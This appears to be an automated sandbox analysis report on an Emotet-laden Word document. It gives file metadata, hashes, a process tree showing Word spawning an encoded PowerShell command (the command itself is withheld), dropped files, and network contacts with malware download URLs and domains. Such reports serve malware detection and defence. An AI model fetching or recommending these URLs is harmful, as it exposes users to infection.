Property | Value |
---|---|
File name | 00_29_G-087448.doc_20200729230440 |
Full analysis | https://app.any.run/tasks/f9298f39-7e42-478d-a4a6-345644cc0b93 |
Verdict | Malicious activity |
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date | August 09, 2020, 01:37:02 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/msword |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Facere., Author: Antoine Clement, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jul 29 11:28:00 2020, Last Saved Time/Date: Wed Jul 29 11:28:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 35, Security: 0 |
MD5 | BAACB06439B2CEE8A566CEA6321D91A2 |
SHA1 | 8BDDA11E2B3FF3B7F92BAB5BA69EF3D5DD65A56E |
SHA256 | EEC719798DE02C60D853DFA81688D2668A95E113447753CA1C764D9DD1245E65 |
SSDEEP | 3072:T4PrXcuQuvpzm4bkiaMQgAlSZ0qmDWaaNSLMLjk:sDRv1m4bnQgISZ0XD4NSLMLjk |
Extension | Detected type (score) |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title | Facere. |
Subject | - |
Author | Antoine Clement |
Keywords | - |
Comments | - |
Template | Normal.dotm |
LastModifiedBy | - |
RevisionNumber | 1 |
Software | Microsoft Office Word |
TotalEditTime | - |
CreateDate | 2020:07:29 10:28:00 |
ModifyDate | 2020:07:29 10:28:00 |
Pages | 2 |
Words | 5 |
Characters | 35 |
Security | None |
Company | - |
Lines | 1 |
Paragraphs | 1 |
CharCountWithSpaces | 39 |
AppVersion | 15 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | - |
HeadingPairs | |
CodePage | Unicode UTF-16, little endian |
LocaleIndicator | 1033 |
CompObjUserTypeLen | 32 |
CompObjUserType | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2880 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\00_29_G-087448.doc_20200729230440.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
3480 | powersheLL -e [encoded command not shown] | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2400 | "C:\Program Files\Google\Chrome\Application\chrome.exe" | C:\Program Files\Google\Chrome\Application\chrome.exe | | explorer.exe | User: admin; Company: Google LLC; Integrity Level: MEDIUM; Description: Google Chrome; Version: 75.0.3770.100 |
3244 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x62d1a9d0,0x62d1a9e0,0x62d1a9ec | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | User: admin; Company: Google LLC; Integrity Level: MEDIUM; Description: Google Chrome; Version: 75.0.3770.100 |
2816 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2480 --on-initialized-event-handle=324 --parent-handle=328 /prefetch:6 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | User: admin; Company: Google LLC; Integrity Level: MEDIUM; Description: Google Chrome; Version: 75.0.3770.100 |
3456 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=15079891601684511029 --mojo-platform-channel-handle=1004 --ignored=" --type=renderer " /prefetch:2 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | User: admin; Company: Google LLC; Integrity Level: LOW; Description: Google Chrome; Version: 75.0.3770.100 |
1672 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --service-request-channel-token=17582376205363116773 --mojo-platform-channel-handle=1608 /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | | chrome.exe | User: admin; Company: Google LLC; Integrity Level: MEDIUM; Description: Google Chrome; Version: 75.0.3770.100 |
3240 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15894771225404834457 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2252 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | User: admin; Company: Google LLC; Integrity Level: LOW; Description: Google Chrome; Version: 75.0.3770.100 |
2572 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=2916659571460060374 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2472 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | User: admin; Company: Google LLC; Integrity Level: LOW; Description: Google Chrome; Version: 75.0.3770.100 |
2740 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=9555915752394036607 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2512 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | User: admin; Company: Google LLC; Integrity Level: LOW; Description: Google Chrome; Version: 75.0.3770.100 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR114C.tmp.cvr | — | — | — |
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF34627BCF04986F2D.TMP | — | — | — |
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFBD32CB963AD497A2.TMP | — | — | — |
3480 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8GHW8FCRZT0MYKEUBIEW.temp | — | — | — |
2400 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\172ed73e-de48-4293-b9ce-bde01e5d4ca0.tmp | — | — | — |
2400 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000032.dbtmp | — | — | — |
3480 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A0850076FAAAE7B4EAF7305558E59940 | AB8DD0A820F260EF05E605A98A6EDD9B1276B4BF7F630647F7578493BA988E55 |
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | BB120F82B0FCC9DCEAF40AEBF16CB22A | 5C54D66DE5478B3CC04A408E6BFC14333DDBD5B1963CF3BA56FC8F0399B8B9E8 |
2880 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 10D8AAF7479958FE7FDA438167054A88 | 81F992AC0DA2ECFC285562AE958151B890374509AC5161F055A0E0B50DB50D55 |
2400 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF19e2c5.TMP | text | D11C35B3D5258F594933332C11C6F0F2 | DC2EB16E16FA3FB258AC31A481F817208CF0C917AF4224F2832588D3A64ADD05 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3480 | powersheLL.exe | GET | 200 | 104.28.4.216:80 | http://www.duhallow.com/wp-content/pm2kX374/ | US | html | 3.96 Kb | malicious |
3480 | powersheLL.exe | GET | 404 | 74.220.205.241:80 | http://dishnchips.com/Library/WK/ | US | html | 315 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3480 | powersheLL.exe | 107.154.146.153:443 | classic-recipes.com | Incapsula Inc | US | unknown |
3480 | powersheLL.exe | 104.28.4.216:80 | www.duhallow.com | Cloudflare Inc | US | shared |
3480 | powersheLL.exe | 74.220.205.241:80 | dishnchips.com | Unified Layer | US | unknown |
3480 | powersheLL.exe | 203.123.252.13:80 | alaksir.com | Pacific Link Indonesia | ID | suspicious |
1672 | chrome.exe | 172.217.18.163:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted |
1672 | chrome.exe | 172.217.16.141:443 | accounts.google.com | Google Inc. | US | suspicious |
1672 | chrome.exe | 172.217.23.131:443 | fonts.gstatic.com | Google Inc. | US | whitelisted |
1672 | chrome.exe | 216.58.212.138:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
1672 | chrome.exe | 172.217.18.174:443 | apis.google.com | Google Inc. | US | whitelisted |
1672 | chrome.exe | 216.58.212.164:443 | www.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.duhallow.com | | malicious |
alaksir.com | | suspicious |
classic-recipes.com | | whitelisted |
dishnchips.com | | unknown |
duncanllc.com | | unknown |
clientservices.googleapis.com | | whitelisted |
accounts.google.com | | shared |
www.google.com | | whitelisted |
fonts.googleapis.com | | whitelisted |
www.gstatic.com | | whitelisted |